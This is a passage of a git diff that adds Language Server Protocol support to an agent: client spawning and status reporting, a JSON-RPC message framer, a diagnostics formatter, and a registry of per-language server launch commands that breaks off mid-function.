+        per_server_root = srv.resolve_root(file_path, ws_root)
+        if per_server_root is None:
+            eventlog.log_disabled(
+                srv.server_id, file_path, "exclude marker hit (server gated off)"
+            )
+            return None  # exclude marker hit, server gated off
+
+        key = (srv.server_id, per_server_root)
+        if key in self._broken:
+            return None
+        with self._state_lock:
+            client = self._clients.get(key)
+            if client is not None and client.is_running:
+                eventlog.log_active(srv.server_id, per_server_root)
+                return client
+            spawning = self._spawning.get(key)
+        if spawning is not None:
+            try:
+                return await spawning
+            except Exception:  # noqa: BLE001
+                return None
+
+        # Begin spawn
+        loop = asyncio.get_running_loop()
+        spawn_future: asyncio.Future = loop.create_future()
+        with self._state_lock:
+            self._spawning[key] = spawn_future
+        try:
+            ctx = ServerContext(
+                workspace_root=per_server_root,
+                install_strategy=self._install_strategy,
+                binary_overrides=self._binary_overrides,
+                env_overrides=self._env_overrides,
+                init_overrides=self._init_overrides,
+            )
+            spec = srv.build_spawn(per_server_root, ctx)
+            if spec is None:
+                # ``build_spawn`` returns None when the binary can't be
+                # located (auto-install disabled, manual-only server,
+                # or install attempt failed).  Surface this once via
+                # the structured logger so the user can act on it.
+                eventlog.log_server_unavailable(srv.server_id, srv.server_id)
+                self._broken.add(key)
+                spawn_future.set_result(None)
+                return None
+            client = LSPClient(
+                server_id=srv.server_id,
+                workspace_root=spec.workspace_root,
+                command=spec.command,
+                env=spec.env,
+                cwd=spec.cwd,
+                initialization_options=spec.initialization_options,
+                seed_diagnostics_on_first_push=spec.seed_diagnostics_on_first_push or srv.seed_first_push,
+            )
+            try:
+                await client.start()
+            except Exception as e:  # noqa: BLE001
+                eventlog.log_spawn_failed(srv.server_id, per_server_root, e)
+                self._broken.add(key)
+                spawn_future.set_result(None)
+                return None
+            with self._state_lock:
+                self._clients[key] = client
+            self._last_used[key] = time.time()
+            eventlog.log_active(srv.server_id, per_server_root)
+            spawn_future.set_result(client)
+            return client
+        finally:
+            with self._state_lock:
+                self._spawning.pop(key, None)
+
+    async def _shutdown_async(self) -> None:
+        with self._state_lock:
+            clients = list(self._clients.values())
+            self._clients.clear()
+            self._broken.clear()
+            self._last_used.clear()
+        await asyncio.gather(
+            *(c.shutdown() for c in clients),
+            return_exceptions=True,
+        )
+
+    # ------------------------------------------------------------------
+    # status / introspection (used by ``hermes lsp status``)
+    # ------------------------------------------------------------------
+
+    def get_status(self) -> Dict[str, Any]:
+        """Return a snapshot of the service for the CLI status command."""
+        with self._state_lock:
+            clients = [
+                {
+                    "server_id": k[0],
+                    "workspace_root": k[1],
+                    "state": c.state,
+                    "running": c.is_running,
+                }
+                for k, c in self._clients.items()
+            ]
+            broken = list(self._broken)
+        return {
+            "enabled": self._enabled,
+            "wait_mode": self._wait_mode,
+            "wait_timeout": self._wait_timeout,
+            "install_strategy": self._install_strategy,
+            "clients": clients,
+            "broken": broken,
+            "disabled_servers": sorted(self._disabled_servers),
+        }
+
+
+def _diag_key(d: Dict[str, Any]) -> str:
+    """Content equality key used for delta filtering.  Mirrors
+    :func:`agent.lsp.client._diagnostic_key`."""
+    rng = d.get("range") or {}
+    start = rng.get("start") or {}
+    end = rng.get("end") or {}
+    code = d.get("code")
+    if code is not None and not isinstance(code, str):
+        code = str(code)
+    return "\x00".join(
+        [
+            str(d.get("severity") or 1),
+            str(code or ""),
+            str(d.get("source") or ""),
+            str(d.get("message") or "").strip(),
+            f"{start.get('line', 0)}:{start.get('character', 0)}-{end.get('line', 0)}:{end.get('character', 0)}",
+        ]
+    )
+
+
+__all__ = ["LSPService"]
diff --git a/agent/lsp/protocol.py b/agent/lsp/protocol.py
new file mode 100644
index 00000000000..3741ed4e551
--- /dev/null
+++ b/agent/lsp/protocol.py
@@ -0,0 +1,196 @@
+"""Minimal LSP JSON-RPC 2.0 framer over async streams.
+
+LSP wire format:
+
+    Content-Length: <bytes>\\r\\n
+    \\r\\n
+    <utf-8 JSON body>
+
+The body is a JSON-RPC 2.0 envelope: request, response, or notification.
+
+This module replaces what ``vscode-jsonrpc/node`` would do in a
+TypeScript implementation.  We keep it deliberately small — just the
+framer + envelope helpers — so :class:`agent.lsp.client.LSPClient` can
+focus on protocol semantics.
+"""
+from __future__ import annotations
+
+import asyncio
+import json
+import logging
+from typing import Any, Optional, Tuple
+
+logger = logging.getLogger("agent.lsp.protocol")
+
+# LSP error codes we care about.  Full list in
+# https://microsoft.github.io/language-server-protocol/specifications/lsp/3.17/specification/#errorCodes
+ERROR_CONTENT_MODIFIED = -32801
+ERROR_REQUEST_CANCELLED = -32800
+ERROR_METHOD_NOT_FOUND = -32601
+
+
+class LSPProtocolError(Exception):
+    """Raised when the wire protocol is violated.
+
+    Distinct from :class:`LSPRequestError` which represents a server
+    returning a JSON-RPC error response — that's protocol-conformant.
+    This exception means the framing or envelope itself is broken.
+    """
+
+
+class LSPRequestError(Exception):
+    """Raised when an LSP request returns an error response.
+
+    Carries the JSON-RPC ``code``, ``message``, and optional ``data``.
+    """
+
+    def __init__(self, code: int, message: str, data: Any = None) -> None:
+        super().__init__(f"LSP error {code}: {message}")
+        self.code = code
+        self.message = message
+        self.data = data
+
+
+def encode_message(obj: dict) -> bytes:
+    """Encode a JSON-RPC envelope as a Content-Length framed byte string.
+
+    The body is encoded as compact UTF-8 JSON (no spaces between
+    separators) — matches what ``vscode-jsonrpc`` emits and keeps the
+    Content-Length count exact.
+    """
+    body = json.dumps(obj, separators=(",", ":"), ensure_ascii=False).encode("utf-8")
+    header = f"Content-Length: {len(body)}\r\n\r\n".encode("ascii")
+    return header + body
+
+
+async def read_message(reader: asyncio.StreamReader) -> Optional[dict]:
+    """Read one Content-Length framed JSON-RPC message from the stream.
+
+    Returns ``None`` on clean EOF (server closed stdout cleanly between
+    messages — typical shutdown).  Raises :class:`LSPProtocolError` on
+    malformed framing.
+
+    The reader is advanced to just past the JSON body on success.
+    """
+    headers: dict = {}
+    header_bytes = 0
+    while True:
+        try:
+            line = await reader.readuntil(b"\r\n")
+        except asyncio.IncompleteReadError as e:
+            # EOF while reading headers.  If we hadn't started a header
+            # block, treat as clean EOF; otherwise the framing is bad.
+            if not e.partial and not headers:
+                return None
+            raise LSPProtocolError(
+                f"unexpected EOF while reading LSP headers (partial={e.partial!r})"
+            ) from e
+        # Defensive cap against a server streaming headers without ever
+        # emitting CRLF-CRLF.  Caps total header bytes at 8 KiB — a
+        # well-behaved server fits in well under 200 bytes.
+        header_bytes += len(line)
+        if header_bytes > 8192:
+            raise LSPProtocolError(
+                f"LSP header block exceeded 8 KiB without terminator"
+            )
+        line = line[:-2]  # strip CRLF
+        if not line:
+            break  # blank line ends header block
+        try:
+            key, _, value = line.decode("ascii").partition(":")
+        except UnicodeDecodeError as e:
+            raise LSPProtocolError(f"non-ASCII LSP header: {line!r}") from e
+        if not key:
+            raise LSPProtocolError(f"malformed LSP header line: {line!r}")
+        headers[key.strip().lower()] = value.strip()
+
+    cl = headers.get("content-length")
+    if cl is None:
+        raise LSPProtocolError(f"LSP message missing Content-Length: {headers!r}")
+    try:
+        n = int(cl)
+    except ValueError as e:
+        raise LSPProtocolError(f"non-integer Content-Length: {cl!r}") from e
+    if n < 0 or n > 64 * 1024 * 1024:  # 64 MiB sanity cap
+        raise LSPProtocolError(f"unreasonable Content-Length: {n}")
+
+    try:
+        body = await reader.readexactly(n)
+    except asyncio.IncompleteReadError as e:
+        raise LSPProtocolError(
+            f"truncated LSP body: expected {n} bytes, got {len(e.partial)}"
+        ) from e
+
+    try:
+        return json.loads(body.decode("utf-8"))
+    except json.JSONDecodeError as e:
+        raise LSPProtocolError(f"invalid JSON in LSP body: {e}") from e
+    except UnicodeDecodeError as e:
+        raise LSPProtocolError(f"non-UTF-8 LSP body: {e}") from e
+
+
+def make_request(req_id: int, method: str, params: Any) -> dict:
+    """Build a JSON-RPC 2.0 request envelope."""
+    msg: dict = {"jsonrpc": "2.0", "id": req_id, "method": method}
+    if params is not None:
+        msg["params"] = params
+    return msg
+
+
+def make_notification(method: str, params: Any) -> dict:
+    """Build a JSON-RPC 2.0 notification envelope (no ``id``)."""
+    msg: dict = {"jsonrpc": "2.0", "method": method}
+    if params is not None:
+        msg["params"] = params
+    return msg
+
+
+def make_response(req_id: Any, result: Any) -> dict:
+    """Build a JSON-RPC 2.0 success response envelope."""
+    return {"jsonrpc": "2.0", "id": req_id, "result": result}
+
+
+def make_error_response(req_id: Any, code: int, message: str, data: Any = None) -> dict:
+    """Build a JSON-RPC 2.0 error response envelope."""
+    err: dict = {"code": code, "message": message}
+    if data is not None:
+        err["data"] = data
+    return {"jsonrpc": "2.0", "id": req_id, "error": err}
+
+
+def classify_message(msg: dict) -> Tuple[str, Any]:
+    """Return ``(kind, key)`` where kind is one of ``request``,
+    ``response``, ``notification``, ``invalid``.
+
+    The key is the request id for request/response, the method name
+    for notifications, and ``None`` for invalid messages.
+    """
+    if not isinstance(msg, dict):
+        return "invalid", None
+    if msg.get("jsonrpc") != "2.0":
+        return "invalid", None
+    has_id = "id" in msg
+    has_method = "method" in msg
+    if has_id and has_method:
+        return "request", msg["id"]
+    if has_id and ("result" in msg or "error" in msg):
+        return "response", msg["id"]
+    if has_method and not has_id:
+        return "notification", msg["method"]
+    return "invalid", None
+
+
+__all__ = [
+    "ERROR_CONTENT_MODIFIED",
+    "ERROR_REQUEST_CANCELLED",
+    "ERROR_METHOD_NOT_FOUND",
+    "LSPProtocolError",
+    "LSPRequestError",
+    "encode_message",
+    "read_message",
+    "make_request",
+    "make_notification",
+    "make_response",
+    "make_error_response",
+    "classify_message",
+]
diff --git a/agent/lsp/reporter.py b/agent/lsp/reporter.py
new file mode 100644
index 00000000000..fedad0d19b3
--- /dev/null
+++ b/agent/lsp/reporter.py
@@ -0,0 +1,78 @@
+"""Format LSP diagnostics for inclusion in tool output.
+
+The model sees a compact, severity-filtered, line-bounded summary of
+diagnostics introduced by the latest edit.  Format matches what
+OpenCode's ``lsp/diagnostic.ts`` and Claude Code's
+``formatDiagnosticsSummary`` produce — ``<diagnostics>`` blocks with
+1-indexed line/column, capped at ``MAX_PER_FILE`` errors.
+"""
+from __future__ import annotations
+
+from typing import Any, Dict, List
+
+# Severity-1 only by default — warnings/info/hints would flood the
+# agent.  Lift this in config under ``lsp.severities`` if needed.
+SEVERITY_NAMES = {1: "ERROR", 2: "WARN", 3: "INFO", 4: "HINT"}
+DEFAULT_SEVERITIES = frozenset({1})  # ERROR only
+
+MAX_PER_FILE = 20
+MAX_TOTAL_CHARS = 4000
+
+
+def format_diagnostic(d: Dict[str, Any]) -> str:
+    """One-line representation of a single diagnostic."""
+    sev = SEVERITY_NAMES.get(d.get("severity") or 1, "ERROR")
+    rng = d.get("range") or {}
+    start = rng.get("start") or {}
+    line = int(start.get("line", 0)) + 1
+    col = int(start.get("character", 0)) + 1
+    msg = str(d.get("message") or "").rstrip()
+    code = d.get("code")
+    code_part = f" [{code}]" if code not in (None, "") else ""
+    source = d.get("source")
+    source_part = f" ({source})" if source else ""
+    return f"{sev} [{line}:{col}] {msg}{code_part}{source_part}"
+
+
+def report_for_file(
+    file_path: str,
+    diagnostics: List[Dict[str, Any]],
+    *,
+    severities: frozenset = DEFAULT_SEVERITIES,
+    max_per_file: int = MAX_PER_FILE,
+) -> str:
+    """Build a ``<diagnostics file=...>`` block for one file.
+
+    Returns an empty string when no diagnostics pass the severity
+    filter, so callers can do ``if block:`` to skip empty cases.
+    """
+    if not diagnostics:
+        return ""
+    filtered = [d for d in diagnostics if (d.get("severity") or 1) in severities]
+    if not filtered:
+        return ""
+    limited = filtered[:max_per_file]
+    extra = len(filtered) - len(limited)
+    lines = [format_diagnostic(d) for d in limited]
+    body = "\n".join(lines)
+    if extra > 0:
+        body += f"\n... and {extra} more"
+    return f"<diagnostics file=\"{file_path}\">\n{body}\n</diagnostics>"
+
+
+def truncate(s: str, *, limit: int = MAX_TOTAL_CHARS) -> str:
+    """Hard-cap a formatted summary string."""
+    if len(s) <= limit:
+        return s
+    marker = "\n…[truncated]"
+    return s[: limit - len(marker)] + marker
+
+
+__all__ = [
+    "SEVERITY_NAMES",
+    "DEFAULT_SEVERITIES",
+    "MAX_PER_FILE",
+    "format_diagnostic",
+    "report_for_file",
+    "truncate",
+]
diff --git a/agent/lsp/servers.py b/agent/lsp/servers.py
new file mode 100644
index 00000000000..df919fba991
--- /dev/null
+++ b/agent/lsp/servers.py
@@ -0,0 +1,1025 @@
+"""Server registry — per-language LSP server definitions.
+
+Each :class:`ServerDef` knows how to:
+
+- match a file by extension (or basename for extensionless files like
+  ``Dockerfile``),
+- resolve a project root from a file path (often via
+  :func:`agent.lsp.workspace.nearest_root`),
+- assemble the spawn command (binary, args, env, cwd),
+- compute LSP ``initializationOptions``.
+
+Auto-installation is a separate concern handled by
+:mod:`agent.lsp.install`.  This module describes WHAT to spawn; the
+install module makes the binary appear on PATH if it isn't there.
+
+The full set of servers ships with the package, but most are only
+*invoked* when the user actually edits a file in that language.  This
+keeps cold-start fast — we don't probe binaries until needed.
+"""
+from __future__ import annotations
+
+import logging
+import os
+import shutil
+from dataclasses import dataclass, field
+from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple
+
+from agent.lsp.workspace import nearest_root, normalize_path
+
+logger = logging.getLogger("agent.lsp.servers")
+
+# Language IDs per LSP spec.  Used for ``textDocument/didOpen.languageId``.
+# Most servers don't care exactly, but a few (typescript-language-server,
+# vue-language-server) refuse files with the wrong ID.
+LANGUAGE_BY_EXT: Dict[str, str] = {
+    ".py": "python",
+    ".pyi": "python",
+    ".ts": "typescript",
+    ".tsx": "typescriptreact",
+    ".js": "javascript",
+    ".jsx": "javascriptreact",
+    ".mjs": "javascript",
+    ".cjs": "javascript",
+    ".mts": "typescript",
+    ".cts": "typescript",
+    ".vue": "vue",
+    ".svelte": "svelte",
+    ".astro": "astro",
+    ".go": "go",
+    ".rs": "rust",
+    ".rb": "ruby",
+    ".rake": "ruby",
+    ".gemspec": "ruby",
+    ".ru": "ruby",
+    ".c": "c",
+    ".h": "c",
+    ".cc": "cpp",
+    ".cpp": "cpp",
+    ".cxx": "cpp",
+    ".hh": "cpp",
+    ".hpp": "cpp",
+    ".hxx": "cpp",
+    ".cs": "csharp",
+    ".csx": "csharp",
+    ".fs": "fsharp",
+    ".fsi": "fsharp",
+    ".fsx": "fsharp",
+    ".swift": "swift",
+    ".java": "java",
+    ".kt": "kotlin",
+    ".kts": "kotlin",
+    ".yaml": "yaml",
+    ".yml": "yaml",
+    ".json": "json",
+    ".jsonc": "jsonc",
+    ".lua": "lua",
+    ".php": "php",
+    ".prisma": "prisma",
+    ".dart": "dart",
+    ".ml": "ocaml",
+    ".mli": "ocaml",
+    ".sh": "shellscript",
+    ".bash": "shellscript",
+    ".zsh": "shellscript",
+    ".tf": "terraform",
+    ".tfvars": "terraform",
+    ".tex": "latex",
+    ".bib": "bibtex",
+    ".gleam": "gleam",
+    ".clj": "clojure",
+    ".cljs": "clojurescript",
+    ".cljc": "clojure",
+    ".edn": "clojure",
+    ".nix": "nix",
+    ".typ": "typst",
+    ".typc": "typst",
+    ".hs": "haskell",
+    ".lhs": "haskell",
+    ".jl": "julia",
+    ".ex": "elixir",
+    ".exs": "elixir",
+    ".zig": "zig",
+    ".zon": "zig",
+    ".dockerfile": "dockerfile",
+}
+
+
+@dataclass
+class SpawnSpec:
+    """The result of resolving a server for a file.
+
+    Returned by :meth:`ServerDef.resolve` when a server is applicable
+    to a file.  ``None`` is returned instead when the server should
+    be skipped (binary missing and auto-install disabled, project
+    marker not found, exclude marker hit, etc.).
+    """
+
+    command: List[str]
+    workspace_root: str
+    cwd: str
+    env: Dict[str, str] = field(default_factory=dict)
+    initialization_options: Dict[str, Any] = field(default_factory=dict)
+    seed_diagnostics_on_first_push: bool = False
+
+
+@dataclass
+class ServerDef:
+    """Definition of one language server.
+
+    The :func:`resolve_root` callable receives the absolute file path
+    plus the workspace root (git worktree) and returns either the
+    project-specific root for this server (e.g. the directory
+    containing ``pyproject.toml``) or ``None`` to skip.
+
+    The :func:`build_spawn` callable receives the resolved root and
+    returns a :class:`SpawnSpec` (or ``None`` if the binary can't be
+    found and auto-install isn't configured).
+    """
+
+    server_id: str
+    extensions: Tuple[str, ...]
+    resolve_root: Callable[[str, str], Optional[str]]
+    build_spawn: Callable[[str, "ServerContext"], Optional[SpawnSpec]]
+    seed_first_push: bool = False
+    description: str = ""
+
+    def matches(self, file_path: str) -> bool:
+        """Return True iff this server handles ``file_path``."""
+        ext = _file_ext_or_basename(file_path)
+        return ext in self.extensions
+
+
+@dataclass
+class ServerContext:
+    """Context passed into :meth:`ServerDef.build_spawn`.
+
+    Carries the user's auto-install policy, any user-overridden
+    binary paths, and helpers the spawn builder needs.  All fields
+    are optional; defaults yield "auto-install allowed, no overrides".
+    """
+
+    workspace_root: str
+    install_strategy: str = "auto"  # "auto" | "manual" | "off"
+    binary_overrides: Dict[str, List[str]] = field(default_factory=dict)
+    env_overrides: Dict[str, Dict[str, str]] = field(default_factory=dict)
+    init_overrides: Dict[str, Dict[str, Any]] = field(default_factory=dict)
+
+
+# ---------------------------------------------------------------------------
+# helpers
+# ---------------------------------------------------------------------------
+
+
+def _file_ext_or_basename(path: str) -> str:
+    """Return the lower-cased extension OR full basename for extensionless files.
+
+    Mirrors OpenCode's ``path.parse(file).ext || file`` — files like
+    ``Dockerfile`` or ``Makefile`` match by basename, while normal
+    files match by extension (``.py``, ``.ts``).
+    """
+    base = os.path.basename(path)
+    _root, ext = os.path.splitext(base)
+    if ext:
+        return ext.lower()
+    return base
+
+
+def _which(*names: str) -> Optional[str]:
+    """Return the full path of the first command found on PATH."""
+    for n in names:
+        path = shutil.which(n)
+        if path:
+            return path
+    return None
+
+
+def _root_or_workspace(file_path: str, workspace: str, markers: Sequence[str], excludes: Sequence[str] = ()) -> Optional[str]:
+    """Common pattern: try ``nearest_root``, fall back to workspace root.
+
+    Returns ``None`` if an exclude marker matches first (server gated off).
+    """
+    found = nearest_root(
+        file_path,
+        markers,
+        excludes=excludes,
+        ceiling=os.path.dirname(workspace) if workspace else None,
+    )
+    if found is None and excludes:
+        # Distinguish "no marker found" from "exclude hit": when
+        # excludes are configured, None means gated off.
+        # Re-check without excludes — if still None, we fall back to
+        # workspace; if found, the exclude hit and we return None.
+        recheck = nearest_root(
+            file_path,
+            markers,
+            ceiling=os.path.dirname(workspace) if workspace else None,
+        )
+        if recheck is not None:
+            return None  # exclude triggered
+        return workspace
+    return found or workspace
+
+
+# ---------------------------------------------------------------------------
+# per-server spawn builders
+# ---------------------------------------------------------------------------
+
+
+def _spawn_pyright(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "pyright") or _which(
+        "pyright-langserver", "pyright"
+    )
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("pyright", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    # If we got the cli ``pyright``, the langserver is its sibling.
+    base = os.path.basename(bin_path)
+    if base in ("pyright", "pyright.exe"):
+        sibling = os.path.join(os.path.dirname(bin_path), "pyright-langserver")
+        if os.path.exists(sibling):
+            bin_path = sibling
+    init: Dict[str, Any] = {}
+    # Pick the project's venv interpreter if there is one — otherwise
+    # pyright defaults to "python on PATH" which is rarely the venv.
+    py = _detect_python(root)
+    if py:
+        init["python"] = {"pythonPath": py}
+    if "pyright" in ctx.init_overrides:
+        init.update(ctx.init_overrides["pyright"])
+    return SpawnSpec(
+        command=[bin_path, "--stdio"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("pyright", {}),
+        initialization_options=init,
+    )
+
+
+def _detect_python(root: str) -> Optional[str]:
+    candidates = []
+    if os.environ.get("VIRTUAL_ENV"):
+        candidates.append(os.environ["VIRTUAL_ENV"])
+    candidates.extend([os.path.join(root, ".venv"), os.path.join(root, "venv")])
+    for v in candidates:
+        for sub in ("bin/python", "bin/python3", "Scripts/python.exe"):
+            p = os.path.join(v, sub)
+            if os.path.exists(p):
+                return p
+    return None
+
+
+def _spawn_typescript(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "typescript") or _which("typescript-language-server")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("typescript-language-server", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path, "--stdio"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("typescript", {}),
+        initialization_options=ctx.init_overrides.get("typescript", {}),
+        seed_diagnostics_on_first_push=True,
+    )
+
+
+def _spawn_gopls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "gopls") or _which("gopls")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("gopls", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("gopls", {}),
+        initialization_options=ctx.init_overrides.get("gopls", {}),
+    )
+
+
+def _spawn_rust_analyzer(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "rust-analyzer") or _which("rust-analyzer")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("rust-analyzer", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("rust-analyzer", {}),
+        initialization_options=ctx.init_overrides.get("rust-analyzer", {}),
+    )
+
+
+def _spawn_clangd(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "clangd") or _which("clangd")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("clangd", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path, "--background-index", "--clang-tidy"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("clangd", {}),
+        initialization_options=ctx.init_overrides.get("clangd", {}),
+    )
+
+
+def _spawn_bash_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "bash-language-server") or _which("bash-language-server")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("bash-language-server", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path, "start"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("bash-language-server", {}),
+        initialization_options=ctx.init_overrides.get("bash-language-server", {}),
+    )
+
+
+def _spawn_yaml_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "yaml-language-server") or _which("yaml-language-server")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("yaml-language-server", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path, "--stdio"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("yaml-language-server", {}),
+        initialization_options=ctx.init_overrides.get("yaml-language-server", {}),
+    )
+
+
+def _spawn_lua_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "lua-language-server") or _which("lua-language-server")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("lua-language-server", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("lua-language-server", {}),
+        initialization_options=ctx.init_overrides.get("lua-language-server", {}),
+    )
+
+
+def _spawn_intelephense(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "intelephense") or _which("intelephense")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("intelephense", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    init = {"telemetry": {"enabled": False}}
+    init.update(ctx.init_overrides.get("intelephense", {}))
+    return SpawnSpec(
+        command=[bin_path, "--stdio"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("intelephense", {}),
+        initialization_options=init,
+    )
+
+
+def _spawn_ocamllsp(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "ocaml-lsp") or _which("ocamllsp")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("ocaml-lsp", {}),
+        initialization_options=ctx.init_overrides.get("ocaml-lsp", {}),
+    )
+
+
+def _spawn_dockerfile_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "dockerfile-ls") or _which("docker-langserver")
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("dockerfile-language-server-nodejs", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path, "--stdio"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("dockerfile-ls", {}),
+        initialization_options=ctx.init_overrides.get("dockerfile-ls", {}),
+    )
+
+
+def _spawn_terraform_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "terraform-ls") or _which("terraform-ls")
+    if bin_path is None:
+        return None  # terraform-ls is heavy to auto-install; require user
+    init = {
+        "experimentalFeatures": {
+            "prefillRequiredFields": True,
+            "validateOnSave": True,
+        }
+    }
+    init.update(ctx.init_overrides.get("terraform-ls", {}))
+    return SpawnSpec(
+        command=[bin_path, "serve"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("terraform-ls", {}),
+        initialization_options=init,
+    )
+
+
+def _spawn_dart(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "dart") or _which("dart")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path, "language-server", "--lsp"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("dart", {}),
+        initialization_options=ctx.init_overrides.get("dart", {}),
+    )
+
+
+def _spawn_haskell_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "haskell-language-server") or _which(
+        "haskell-language-server-wrapper", "haskell-language-server"
+    )
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path, "--lsp"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("haskell-language-server", {}),
+        initialization_options=ctx.init_overrides.get("haskell-language-server", {}),
+    )
+
+
+def _spawn_julia(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "julia") or _which("julia")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[
+            bin_path,
+            "--startup-file=no",
+            "--history-file=no",
+            "-e",
+            "using LanguageServer; runserver()",
+        ],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("julia", {}),
+        initialization_options=ctx.init_overrides.get("julia", {}),
+    )
+
+
+def _spawn_clojure_lsp(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "clojure-lsp") or _which("clojure-lsp")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path, "listen"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("clojure-lsp", {}),
+        initialization_options=ctx.init_overrides.get("clojure-lsp", {}),
+    )
+
+
+def _spawn_nixd(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "nixd") or _which("nixd")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("nixd", {}),
+        initialization_options=ctx.init_overrides.get("nixd", {}),
+    )
+
+
+def _spawn_zls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "zls") or _which("zls")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("zls", {}),
+        initialization_options=ctx.init_overrides.get("zls", {}),
+    )
+
+
+def _spawn_gleam(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "gleam") or _which("gleam")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path, "lsp"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("gleam", {}),
+        initialization_options=ctx.init_overrides.get("gleam", {}),
+    )
+
+
+def _spawn_elixir_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "elixir-ls") or _which("elixir-ls", "language_server.sh")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("elixir-ls", {}),
+        initialization_options=ctx.init_overrides.get("elixir-ls", {}),
+    )
+
+
+def _spawn_prisma(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "prisma") or _which("prisma")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path, "language-server"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("prisma", {}),
+        initialization_options=ctx.init_overrides.get("prisma", {}),
+    )
+
+
+def _spawn_kotlin_ls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
